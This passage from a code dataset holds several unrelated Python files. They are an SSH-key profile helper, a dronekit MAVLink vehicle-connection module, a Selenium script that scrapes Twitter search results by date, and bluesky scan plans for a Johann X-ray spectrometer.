os.path.join(self.ssh_path, private_file_name)\n #\n # # Generate rsa key\n # k = paramiko.RSAKey.generate(bits=4 * 1024)\n #\n # # Save keys inside ssh dir\n # k.write_private_key_file(private_key_path, password=None)\n # public_key = k.get_base64()\n # with open('{}.pub'.format(private_key_path), 'w') as pub_file:\n # pub_file.write(public_key)\n #\n # # Save auth detail into config file\n # self.config['auth'][remote] = {\n # 'key': private_key_path,\n # }\n # self.save_config()\n #\n # return {\n # 'private_key_path': private_key_path,\n # 'public_key': public_key,\n # }\n", "sub_path": "aim/engine/profile/profile.py", "file_name": "profile.py", "file_ext": "py", "file_size_in_byte": 3791, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.path.expanduser", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "aim.engine.configs.AIM_PROFILE_NAME", "line_number": 20, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "aim.engine.configs.AIM_PROFILE_CONFIG_FILE_NAME", "line_number": 26, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "aim.engine.configs.AIM_PROFILE_SSH_DIR_NAME", "line_number": 27, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 42, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 62, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 72, "usage_type": "call"}, {"api_name": "re.match", "line_number": 99, "usage_type": "call"}]}
+{"seq_id": "67649511", "text": "from __future__ import print_function\nimport time\nimport socket\nimport sys\nimport os\nimport platform\nimport re\nfrom pymavlink import mavutil\nfrom Queue import Empty\n\nfrom pkgutil import extend_path\n__path__ = extend_path(__path__, __name__)\n\nif platform.system() == 'Windows':\n from errno import WSAECONNRESET as ECONNABORTED\nelse:\n from errno import ECONNABORTED\n\n# Clean impl of mp dependencies for dronekit\n\nimport dronekit.module.api as api\n\ndef errprinter(*args):\n print(*args, file=sys.stderr)\n\nclass FakeAPI:\n def __init__(self, module):\n self.__vehicle = api.MPVehicle(module)\n self.exit = False\n\n def get_vehicles(self, query=None):\n return [ self.__vehicle ]\n\n# def mav_thread(conn, state):\n\n# return (in_queue, out_queue)\n\nclass MavWriter():\n def __init__(self, queue):\n self.queue = queue\n\n def write(self, pkt):\n self.queue.put(pkt)\n\n def read(self):\n errprinter('writer should not have had a read request')\n os._exit(43)\n\ndef send_heartbeat(master):\n master.mav.heartbeat_send(mavutil.mavlink.MAV_TYPE_GCS, mavutil.mavlink.MAV_AUTOPILOT_INVALID, 0, 0, 0)\n\ndef request_data_stream_send(master, rate=1):\n master.mav.request_data_stream_send(master.target_system, master.target_component,\n mavutil.mavlink.MAV_DATA_STREAM_ALL, rate, 1)\n\nfrom Queue import Queue\nfrom threading import Thread\n\nclass MPFakeState:\n def __init__(self, master, status_printer=None):\n self.master = master\n out_queue = Queue()\n # self.mav_thread = mav_thread(master, self)\n # self.mav = master.mav\n\n self.api = None\n\n # TODO get rid of \"master\" object as exposed,\n # keep it private, expose something smaller for dronekit\n self.out_queue = out_queue\n self.master.mav = mavutil.mavlink.MAVLink(MavWriter(self.out_queue), srcSystem=self.master.source_system, use_native=False)\n\n self.command_map = {}\n self.completions = {}\n\n self.target_system = 0\n self.target_component = 0\n\n self.lat = None\n self.lon = None\n self.alt = None\n\n self.vx = None\n self.vy = None\n self.vz = None\n\n self.airspeed = None\n self.groundspeed = None\n\n self.pitch = None\n self.yaw = None\n self.roll = None\n self.pitchspeed = None\n self.yawspeed = None\n self.rollspeed = None\n\n self.mount_pitch = None\n self.mount_yaw = None\n self.mount_roll = None\n\n self.voltage = -1\n self.current = -1\n self.level = -1\n\n self.rc_readback = {}\n\n self.last_waypoint = 0\n\n self.eph = None\n self.epv = None\n self.satellites_visible = None\n self.fix_type = None # FIXME support multiple GPSs per vehicle - possibly by using componentId\n\n self.rngfnd_distance = None\n self.rngfnd_voltage = None\n\n self.status = type('MPStatus',(object,),{\n 'flightmode': 'AUTO',\n 'armed': False,\n })()\n\n self.mav_param = {} \n\n # Weird\n self.mpstate = self\n self.functions = self\n self.mpstate.settings = self\n\n self.status_printer = status_printer\n\n def fix_targets(self, message):\n pass\n # \"\"\"Set correct target IDs for our vehicle\"\"\"\n # settings = self.mpstate.settings\n # if hasattr(message, 'target_system'):\n # message.target_system = settings.target_system\n # if hasattr(message, 'target_component'):\n # message.target_component = settings.target_component\n\n def module(self, which):\n # psyche\n return self\n\n def param_set(self, name, value, retries=3):\n # TODO dumbly reimplement this using timeout loops\n # because we should actually be awaiting an ACK of PARAM_VALUE\n # changed, but we don't have a proper ack structure, we'll\n # instead just wait until the value itself was changed\n\n name = name.upper()\n value = float(value)\n success = False\n while retries > 0:\n retries -= 1\n self.master.param_set_send(name.upper(), value)\n tstart = time.time()\n while time.time() - tstart < 1:\n if self.mav_param[name] == value:\n return True\n time.sleep(0.1)\n \n errprinter(\"timeout setting parameter %s to %f\" % (name, value))\n return False\n\n def __on_change(self, *args):\n for a in args:\n for v in self.api.get_vehicles():\n v.notify_observers(a)\n\n def mavlink_packet(self, m):\n typ = m.get_type()\n if typ == 'STATUSTEXT':\n print(re.sub(r'(^|\\n)', '>>> \\1', m.text.rstrip()))\n elif typ == 'GLOBAL_POSITION_INT':\n (self.lat, self.lon) = (m.lat / 1.0e7, m.lon / 1.0e7)\n (self.vx, self.vy, self.vz) = (m.vx / 100.0, m.vy / 100.0, m.vz / 100.0)\n self.__on_change('location', 'velocity')\n elif typ == 'GPS_RAW':\n pass # better to just use global position int\n # (self.lat, self.lon) = (m.lat, m.lon)\n # self.__on_change('location')\n elif typ == 'GPS_RAW_INT':\n # (self.lat, self.lon) = (m.lat / 1.0e7, m.lon / 1.0e7)\n self.eph = m.eph\n self.epv = m.epv\n self.satellites_visible = m.satellites_visible\n self.fix_type = m.fix_type\n self.__on_change('gps_0')\n elif typ == \"VFR_HUD\":\n self.heading = m.heading\n self.alt = m.alt\n self.airspeed = m.airspeed\n self.groundspeed = m.groundspeed\n self.__on_change('location', 'airspeed', 'groundspeed')\n elif typ == \"ATTITUDE\":\n self.pitch = m.pitch\n self.yaw = m.yaw\n self.roll = m.roll\n self.pitchspeed = m.pitchspeed\n self.yawspeed = m.yawspeed\n self.rollspeed = m.rollspeed\n self.__on_change('attitude')\n elif typ == \"SYS_STATUS\":\n self.voltage = m.voltage_battery\n self.current = m.current_battery\n self.level = m.battery_remaining\n self.__on_change('battery')\n elif typ == \"HEARTBEAT\":\n self.__on_change('mode', 'armed')\n elif typ in [\"WAYPOINT_CURRENT\", \"MISSION_CURRENT\"]:\n self.last_waypoint = m.seq\n elif typ == \"RC_CHANNELS_RAW\":\n def set(chnum, v):\n '''Private utility for handling rc channel messages'''\n # use port to allow ch nums greater than 8\n self.rc_readback[str(m.port * 8 + chnum)] = v\n\n set(1, m.chan1_raw)\n set(2, m.chan2_raw)\n set(3, m.chan3_raw)\n set(4, m.chan4_raw)\n set(5, m.chan5_raw)\n set(6, m.chan6_raw)\n set(7, m.chan7_raw)\n set(8, m.chan8_raw)\n elif typ == \"MOUNT_STATUS\":\n self.mount_pitch = m.pointing_a / 100\n self.mount_roll = m.pointing_b / 100\n self.mount_yaw = m.pointing_c / 100\n self.__on_change('mount')\n elif typ == \"RANGEFINDER\":\n self.rngfnd_distance = m.distance\n self.rngfnd_voltage = m.voltage\n self.__on_change('rangefinder')\n\n if self.api:\n for v in self.api.get_vehicles():\n if v.mavrx_callback:\n v.mavrx_callback(m)\n\n def prepare(self, await_params=False):\n # errprinter('Await heartbeat.')\n # TODO this should be more rigious. How to avoid\n # invalid MAVLink prefix '73'\n # invalid MAVLink prefix '13'\n\n params = type('PState',(object,),{\n \"mav_param_count\": -1,\n \"mav_param_set\": [],\n \"loaded\": False,\n \"start\": False,\n })()\n self.mav_param = {}\n self.pstate = params\n self.api = FakeAPI(self)\n\n import atexit\n self.exiting = False\n def onexit():\n self.exiting = True\n atexit.register(onexit)\n\n heartbeat_started = False\n\n def mavlink_thread():\n # Huge try catch in case we see http://bugs.python.org/issue1856\n try:\n # Record the time we received the last \"new\" param.\n last_new_param = time.time()\n last_heartbeat_sent = 0\n last_heartbeat_received = 0\n\n start_duration = 0.2\n repeat_duration = 1\n duration = start_duration\n\n while True:\n # Downtime \n time.sleep(0.05)\n\n # Check the time duration for last \"new\" params exceeds watchdog.\n if params.start:\n if None not in params.mav_param_set:\n params.loaded = True\n\n if not params.loaded and time.time() - last_new_param > duration:\n c = 0\n for i, v in enumerate(params.mav_param_set):\n if v == None:\n self.master.mav.param_request_read_send(self.master.target_system, self.master.target_component, \"\", i)\n c += 1\n if c > 50:\n break\n duration = repeat_duration\n last_new_param = time.time()\n\n # Send 1 heartbeat per second\n if time.time() - last_heartbeat_sent > 1:\n send_heartbeat(self.master)\n last_heartbeat_sent = time.time()\n # Timeout after 5\n if heartbeat_started:\n if last_heartbeat_received == 0:\n last_heartbeat_received = time.time()\n elif time.time() - last_heartbeat_received > 5:\n # raise Exception('Link timeout, no heartbeat in last 5 seconds')\n errprinter('Link timeout, no heartbeat in last 5 seconds')\n last_heartbeat_received = time.time()\n\n while True:\n try:\n msg = self.out_queue.get_nowait()\n self.master.write(msg)\n except socket.error as error:\n if error.errno == ECONNABORTED:\n errprinter('reestablishing connection after read timeout')\n try:\n self.master.close()\n except:\n pass\n self.master = mavutil.mavlink_connection(self.master.address)\n continue\n\n # If connection reset (closed), stop polling.\n return\n except Empty:\n break\n except Exception as e:\n errprinter('mav send error:', e)\n break\n\n while True:\n try:\n msg = self.master.recv_msg()\n except socket.error as error:\n if error.errno == ECONNABORTED:\n errprinter('reestablishing connection after send timeout')\n try:\n self.master.close()\n except:\n pass\n self.master = mavutil.mavlink_connection(self.master.address)\n continue\n\n # If connection reset (closed), stop polling.\n return\n except Exception as e:\n # TODO debug these.\n # errprinter('mav recv error:', e)\n msg = None\n if not msg:\n break\n\n if msg.get_type() == 'PARAM_VALUE':\n # If we discover a new param count, assume we\n # are receiving a new param set.\n if params.mav_param_count != msg.param_count:\n params.loaded = False\n params.start = True\n params.mav_param_count = msg.param_count\n params.mav_param_set = [None]*msg.param_count\n\n # Attempt to set the params. We throw an error\n # if the index is out of range of the count or\n # we lack a param_id.\n try:\n if msg.param_index < msg.param_count and msg:\n if params.mav_param_set[msg.param_index] == None:\n last_new_param = time.time()\n duration = start_duration\n params.mav_param_set[msg.param_index] = msg\n self.mav_param[msg.param_id] = msg.param_value\n except:\n import traceback\n traceback.print_exc()\n\n elif msg.get_type() == 'HEARTBEAT':\n self.status.armed = (msg.base_mode & mavutil.mavlink.MAV_MODE_FLAG_SAFETY_ARMED) != 0\n self.status.flightmode = {v: k for k, v in self.master.mode_mapping().items()}[msg.custom_mode]\n last_heartbeat_received = time.time()\n\n if self.api:\n self.mavlink_packet(msg)\n\n except Exception as e:\n # http://bugs.python.org/issue1856\n if self.exiting:\n pass\n else:\n raise e\n\n\n t = Thread(target=mavlink_thread)\n t.daemon = True\n t.start()\n\n # Wait for first heartbeat.\n while True:\n try:\n self.master.wait_heartbeat()\n break\n except mavutil.mavlink.MAVError:\n continue\n heartbeat_started = True\n\n # Request a list of all parameters.\n request_data_stream_send(self.master)\n while True:\n # This fn actually rate limits itself to every 2s.\n # Just retry with persistence to get our first param stream.\n self.master.param_fetch_all()\n time.sleep(0.1)\n if params.mav_param_count > -1:\n break\n\n # We now should get parameters streaming in.\n # We may not get the full set; we leave the logic to mavlink_thread\n # to determine what params we yet need. Wait if await_params is True.\n if await_params:\n while not params.loaded:\n time.sleep(0.1)\n\n return self.api\n\ndef connect(ip, await_params=False, status_printer=errprinter):\n import dronekit.module.api as api\n state = MPFakeState(mavutil.mavlink_connection(ip))\n state.status_printer = status_printer\n # api.init(state)\n return state.prepare(await_params=await_params).get_vehicles()[0]\n", "sub_path": "dronekit/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 15705, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pkgutil.extend_path", "line_number": 12, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 24, "usage_type": "attribute"}, {"api_name": "dronekit.module.api.MPVehicle", "line_number": 28, "usage_type": "call"}, {"api_name": "dronekit.module.api", "line_number": 28, "usage_type": "name"}, {"api_name": "os._exit", "line_number": 47, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pymavlink.mavutil", "line_number": 50, "usage_type": "name"}, {"api_name": "pymavlink.mavutil.mavlink", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pymavlink.mavutil", "line_number": 54, "usage_type": "name"}, {"api_name": "Queue.Queue", "line_number": 62, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink.MAVLink", "line_number": 71, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pymavlink.mavutil", "line_number": 71, "usage_type": "name"}, {"api_name": "time.time", "line_number": 156, "usage_type": "call"}, {"api_name": "time.time", "line_number": 157, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 160, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 173, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 261, "usage_type": "call"}, {"api_name": "time.time", "line_number": 269, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 279, "usage_type": "call"}, {"api_name": "time.time", "line_number": 286, "usage_type": "call"}, {"api_name": "time.time", "line_number": 295, "usage_type": "call"}, {"api_name": "time.time", "line_number": 298, "usage_type": "call"}, {"api_name": "time.time", "line_number": 300, "usage_type": "call"}, {"api_name": "time.time", "line_number": 304, "usage_type": "call"}, {"api_name": "time.time", "line_number": 305, "usage_type": "call"}, {"api_name": "time.time", "line_number": 308, "usage_type": "call"}, {"api_name": "socket.error", "line_number": 314, "usage_type": "attribute"}, {"api_name": "errno.ECONNABORTED", "line_number": 315, "usage_type": "name"}, {"api_name": "pymavlink.mavutil.mavlink_connection", "line_number": 321, "usage_type": "call"}, {"api_name": "pymavlink.mavutil", "line_number": 321, "usage_type": "name"}, {"api_name": "Queue.Empty", "line_number": 326, "usage_type": "name"}, {"api_name": "socket.error", "line_number": 335, "usage_type": "attribute"}, {"api_name": "errno.ECONNABORTED", "line_number": 336, "usage_type": "name"}, {"api_name": "pymavlink.mavutil.mavlink_connection", "line_number": 342, "usage_type": "call"}, {"api_name": "pymavlink.mavutil", "line_number": 342, "usage_type": "name"}, {"api_name": "time.time", "line_number": 369, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 375, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink", "line_number": 378, "usage_type": "attribute"}, {"api_name": "pymavlink.mavutil", "line_number": 378, "usage_type": "name"}, {"api_name": "time.time", "line_number": 380, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 393, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink", "line_number": 402, "usage_type": "attribute"}, {"api_name": "pymavlink.mavutil", "line_number": 402, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 412, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 421, "usage_type": "call"}, {"api_name": "pymavlink.mavutil.mavlink_connection", "line_number": 427, "usage_type": "call"}, {"api_name": "pymavlink.mavutil", "line_number": 427, "usage_type": "name"}]}
+{"seq_id": "480037083", "text": "\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport time\nimport urllib\nimport calendar\nimport argparse\nimport datetime\n\npython_ver = \"2\"\nbrowser_env = \"firefox\"\n\ndef dformat(date):\n return str(date.year) + \"-\" + str(date.month) + \"-\" + str(date.day)\n\ndef getCalendar_month(month):\n month_array = [\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\"]\n return month_array[month - 1]\n\ndef sformat(date):\n return str(date.day) + \" \" + getCalendar_month(date.month) + \" \" + str(date.year)\n\ndef extractData(data, tdata, date_source):\n date = datetime.datetime.strptime(date_source,\"%Y-%m-%d\")\n until = date + datetime.timedelta(days=1)\n r = [\"date:data\"]\n \n for (e1, e2) in zip(data, tdata):\n tmp = e2.find_all(\"span\")\n t = tmp[0]\n tmp2 = datetime.datetime.fromtimestamp(int(t['data-time']))\n \n if tmp2 > date and until > tmp2:\n #if sformat(date) == e2.text:\n r.append(date_source + \" :\" + e1.text.replace(\"\\n\", \" \").encode('utf-8'))\n return r\n\ndef writeData(data, tdata, word, date_source):\n #try:\n date = datetime.datetime.strptime(date_source,\"%Y-%m-%d\")\n f = open(\"output_\"+ word + \"_\" + date_source +\".txt\",\"w\")\n r = extractData(data, tdata, date_source)\n for e in r:\n #print(e + \"\\n\")\n f.write(e + \"\\n\")\n f.close()\n print(\"Finish word: \" + word +\" date:\" + date_source)\n #except:\n #print(\"save error!\")\n\ndef Ichiyo(word, since, until , interval):\n since = datetime.datetime.strptime(since,\"%Y-%m-%d\")\n until = datetime.datetime.strptime(until,\"%Y-%m-%d\")\n date = since\n while ((date - until) != datetime.timedelta(days=0)):\n date_source = dformat(date)\n r = TWscraping(word, date_source, interval)\n writeData(r[0], r[1], word, date_source)\n date = date + datetime.timedelta(days=1)\n\n\ndef TWscraping(word, date_source, interval):\n date = datetime.datetime.strptime(date_source,\"%Y-%m-%d\")\n if python_ver == \"3\":\n url = urllib.parse.quote(str(word) + \" since:\" + dformat(date - datetime.timedelta(days=1)) + \" until:\" + dformat(date + datetime.timedelta(days=1)))\n else:\n url = urllib.quote(str(word) + \" since:\" + dformat(date - datetime.timedelta(days=1)) + \" until:\" + dformat(date + datetime.timedelta(days=1)))\n \n if browser_env == \"chrome\" or browser_env == \"Chrome\":\n browser = webdriver.Chrome(\"./chromedriver\")\n else:\n browser = webdriver.Firefox()\n browser.get(\"https://twitter.com/search?q=\" + url)\n \n count = 0;\n counttemp = 1;\n print(\"Getting... word: \" + word +\" date:\" + date_source)\n \n try:\n while(count < counttemp):\n count = counttemp\n browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(interval)\n html = browser.page_source.encode('utf-8')\n soup = BeautifulSoup(html, \"lxml\")\n result = soup.find_all(\"p\", class_=\"TweetTextSize js-tweet-text tweet-text\")\n result1 = soup.find_all(\"a\",class_=\"tweet-timestamp js-permalink js-nav js-tooltip\")\n counttemp = len(result)\n print(\"Twitte count : \" + str(count))\n except:\n print(\"Error!!\")\n browser.quit()\n return [result, result1]\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Search and Scraping Twitter Data!\")\n parser.add_argument(\"word\", help=u\"Search key word\")\n parser.add_argument(\"since\", help=u\"get twitter data since this date. example: 2016-04-03\")\n parser.add_argument(\"until\", help=u\"get twitter data until this date. example: 2016-04-04\")\n parser.add_argument(\"-d\", dest=\"date\",help=\"example: 2015-8-12\")\n parser.add_argument(\"-i\", dest=\"interval\", default=2, help=u\"Update interval: Short if it fails do not cry.\")\n parser.add_argument(\"-p\", dest=\"pyversion\", default=2, help=\"python version default 2\")\n parser.add_argument(\"-b\", dest=\"browser\",default=\"firefox\",help=\"if you will use Chrome [-b Chrome] or [-b chrome]\")\n args = parser.parse_args()\n \n python_ver = args.pyversion\n browser_env = args.browser\n \n #TWscraping(args.word, args.date, args.interval)\n Ichiyo(args.word, args.since, args.until, int(args.interval))\n \n\n", "sub_path": "twitter/TwitterScraping.py", "file_name": "TwitterScraping.py", "file_ext": "py", "file_size_in_byte": 4339, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "attribute"}, {"api_name": "urllib.parse.quote", "line_number": 65, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 65, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 65, "usage_type": "call"}, {"api_name": "urllib.quote", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 67, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 70, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 70, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 72, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 72, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 85, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 96, "usage_type": "call"}]}
+{"seq_id": "628588", "text": "print(ttime.ctime() + ' >>>> ' + __file__)\ndef elastic_scan_plan(DE=5, dE=0.1):\n npt = np.round(DE/dE + 1)\n name = 'elastic spectrometer scan'\n plan = bp.relative_scan([pil100k, apb_ave], hhm.energy, -DE/2, DE/2, npt, md={'plan_name': 'elastic_scan ' + motor.name, 'name' : name})\n yield from plan\n\n\ndef johann_calibration_scan_plan(energies=None, DE=5, dE=0.1):\n for energy in energies:\n yield from bps.mv(hhm.energy, energy)\n # yield from move_emission_energy_plan(energy)\n yield from bps.mv(johann_emission.energy, energy)\n yield from elastic_scan_plan(DE=DE, dE=dE)\n\n\n\ndef plot_radiation_damage_scan_data(db, uid):\n t = db[uid].table()\n plt.figure()\n plt.plot(t['time'], t['pil100k_stats1_total']/np.abs(t['apb_ave_ch1_mean']))\n\n\n\n# def move_johann_spectrometer_energy(energy=-1):\n# current_energy = johann_emission.energy.position\n# energy = float(energy)\n# energy_arr = np.linspace(current_energy, energy, int(np.abs(energy - current_energy)/5) + 2)[1:]\n# for _energy in energy_arr:\n# print_to_gui(f'Moving spectrometer to {_energy}')\n# yield from bps.mv(johann_emission, _energy, wait=True)\n# # yield from move_motor_plan(motor_attr=johann_emission.energy.name, based_on='object_name', position=float(_energy))\n\ndef move_johann_spectrometer_energy(energy : float=-1):\n current_energy = johann_emission.energy.position\n energy = float(energy)\n\n current_bragg = rowland_circle.e2bragg(current_energy)\n bragg = rowland_circle.e2bragg(energy)\n\n bragg_arr = np.linspace(current_bragg, bragg, int(np.abs(bragg - current_bragg)/0.25) + 2)[1:]\n energy_arr = rowland_circle.bragg2e(bragg_arr)\n for _bragg, _energy in zip(bragg_arr, energy_arr):\n print_to_gui(f'Moving spectrometer to {_energy}')\n yield from bps.mv(johann_spectrometer, _bragg, wait=True)\n # yield from move_motor_plan(motor_attr=johann_emission.energy.name, based_on='object_name', position=float(_energy))\n\n\ndef prepare_johann_scan_plan(detectors, spectrometer_energy, spectrometer_config_uid):\n ensure_pilatus_is_in_detector_list(detectors)\n if spectrometer_config_uid is not None:\n johann_spectrometer_manager.set_config_by_uid(spectrometer_config_uid)\n yield from move_johann_spectrometer_energy(spectrometer_energy)\n # yield from bps.mv(johann_emission, spectrometer_energy)\n\ndef prepare_johann_metadata_and_kwargs(**kwargs):\n metadata = kwargs.pop('metadata')\n j_metadata = {'spectrometer': 'johann',\n 'spectrometer_config': rowland_circle.config,}\n if 'spectrometer_energy' in kwargs.keys():\n spectrometer_energy = kwargs.pop('spectrometer_energy')\n j_metadata['spectrometer_energy'] = spectrometer_energy\n if 'spectrometer_config_uid' in kwargs.keys():\n j_metadata['spectrometer_config_uid'] = kwargs.pop('spectrometer_config_uid')\n return {**j_metadata, **metadata}, kwargs\n\n\ndef collect_n_exposures_johann_plan(**kwargs):\n yield from prepare_johann_scan_plan(kwargs['detectors'], kwargs['spectrometer_energy'], kwargs['spectrometer_config_uid'])\n metadata, kwargs = prepare_johann_metadata_and_kwargs(**kwargs)\n metadata['spectrometer_config']['scan_type'] = 'constant energy'\n yield from collect_n_exposures_plan(metadata=metadata, **kwargs)\n\n\ndef step_scan_johann_herfd_plan(**kwargs):\n yield from prepare_johann_scan_plan(kwargs['detectors'], kwargs['spectrometer_energy'], kwargs['spectrometer_config_uid'])\n metadata, kwargs = prepare_johann_metadata_and_kwargs(**kwargs)\n metadata['spectrometer_config']['scan_type'] = 'constant energy'\n yield from step_scan_plan(metadata=metadata, **kwargs)\n\ndef fly_scan_johann_herfd_plan(**kwargs):\n # rixs_file_name = kwargs.pop('rixs_file_name')\n yield from prepare_johann_scan_plan(kwargs['detectors'], kwargs['spectrometer_energy'], kwargs['spectrometer_config_uid'])\n metadata, kwargs = prepare_johann_metadata_and_kwargs(**kwargs)\n metadata['spectrometer_config']['scan_type'] = 'constant energy'\n yield from fly_scan_plan(metadata=metadata, **kwargs)\n\n\ndef get_johann_xes_step_scan_md(name, comment, detectors_dict, emission_energy_list, emission_time_list, element, e0, line, spectrometer_config_uid, metadata):\n try:\n full_element_name = getattr(elements, element).name.capitalize()\n except:\n full_element_name = element\n md_general = get_scan_md(name, comment, detectors_dict, '.dat')\n\n md_scan = {'experiment': 'step_scan',\n 'spectrometer': 'johann',\n 'spectrometer_config': rowland_circle.config,\n 'spectrometer_config_uid': spectrometer_config_uid,\n 'spectrometer_energy_steps': emission_energy_list,\n 'spectrometer_time_steps': emission_time_list,\n 'element': element,\n 'element_full': full_element_name,\n 'line': line,\n 'e0': e0,}\n return {**md_scan, **md_general, **metadata}\n\ndef step_scan_johann_xes_plan(name=None, comment=None, detectors=[],\n mono_energy=None, mono_angle_offset=None,\n emission_energy_list=None, emission_time_list=None,\n element='', line='', e0=None,\n spectrometer_config_uid=None,\n metadata={}):\n\n default_detectors = [apb_ave, hhm_encoder]\n # default_detectors = []\n aux_detectors = get_detector_device_list(detectors, flying=False)\n all_detectors = default_detectors + aux_detectors\n detectors_dict = {k: {'device': v} for k, v in zip(detectors, aux_detectors)}\n\n if mono_angle_offset is not None: hhm.set_new_angle_offset(mono_angle_offset)\n yield from bps.mv(hhm.energy, mono_energy)\n yield from prepare_johann_scan_plan(detectors, emission_energy_list[0], spectrometer_config_uid)\n\n md = get_johann_xes_step_scan_md(name, comment, detectors_dict, emission_energy_list, emission_time_list, element,\n e0, line, spectrometer_config_uid, metadata)\n yield from general_energy_step_scan(all_detectors, johann_emission, emission_energy_list, emission_time_list, md=md)\n\n\n\ndef deal_with_sample_coordinates_for_rixs(sample_coordinates, emission_energy_list, name):\n if type(sample_coordinates) == list:\n assert len(sample_coordinates) == len(emission_energy_list), 'number of positions on the sample must match the number of energy points on emission grid'\n else:\n sample_coordinates = [sample_coordinates] * len(emission_energy_list)\n\n if type(name) == list:\n assert len(name) == len(emission_energy_list), 'number of positions on the sample must match the number of energy points on emission grid'\n else:\n name = [name] * len(emission_energy_list)\n\n return sample_coordinates, name\n\n\ndef get_johann_rixs_md(name, element_line, line, e0_line, metadata):\n # metadata['rixs_file_name'] = create_interp_file_name(name, '.rixs')\n metadata['element_line'] = element_line\n metadata['line'] = line\n metadata['e0_line'] = e0_line\n return metadata\n\n\ndef johann_rixs_plan_bundle(plan_name, name=None, comment=None, detectors=[],\n trajectory_filename=None, mono_angle_offset=None,\n emission_energy_list=None, sample_coordinates=None,\n element='', edge='', e0=None, element_line='', line='', e0_line=None,\n rixs_kwargs={}, spectrometer_config_uid=None, metadata={}):\n sample_coordinates, names = deal_with_sample_coordinates_for_rixs(sample_coordinates, emission_energy_list, name)\n metadata = get_johann_rixs_md(name, element_line, line, e0_line, metadata)\n plans = []\n for emission_energy, sample_position, name in zip(emission_energy_list, sample_coordinates, names):\n\n if sample_position is not None:\n plans.append({'plan_name': 'move_sample_stage_plan',\n 'plan_kwargs': {'sample_coordinates': sample_position}})\n\n plans.append({'plan_name': plan_name,\n 'plan_kwargs': {'name': f'{name} {emission_energy:0.2f}',\n 'comment': comment,\n 'detectors': detectors,\n 'trajectory_filename': trajectory_filename,\n 'element': element,\n 'edge': edge,\n 'e0': e0,\n 